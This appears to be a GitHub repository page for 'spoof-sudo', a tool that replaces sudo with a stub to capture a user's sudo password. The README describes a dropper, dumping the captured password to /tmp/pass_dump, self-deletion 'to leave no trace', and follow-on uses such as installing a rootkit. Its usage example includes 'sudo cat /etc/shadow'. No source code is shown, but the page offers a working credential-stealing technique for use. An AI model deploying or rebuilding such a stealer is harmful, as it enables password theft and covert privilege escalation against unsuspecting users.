Skip to content

Security oriented tool used to steal sudo password

Notifications You must be signed in to change notification settings

Srakai/spoof-sudo

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

4 Commits
 
 
 
 
 
 

Repository files navigation

spoof-sudo

Security oriented tool used to steal sudo password

To get best experience use the dropper - it will replace sudo with the stub. When the stub harvests the correct credentials it will dump it to /tmp/pass_dump and remove itself to leave no trace. Of course dumping to /tmp/pass_dump is only PoC and only shows the posibilites of this tool (installing rootkit, runing command as sudo etc.)

Usage:

./dropper

Then invoke any command with sudo Example:

sudo cat /etc/shadow

Your password shoud be now in /tmp/pass_dump

Notes:

The file priv_esc.sh is not really needed beacause the file content is already base64 encoded in the dropper, I put it just so you can get better view over the source code

This tool doesn't need any special priviledges (but it gains them)

Author

  • @Srakai

About

Security oriented tool used to steal sudo password

Topics

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published

Languages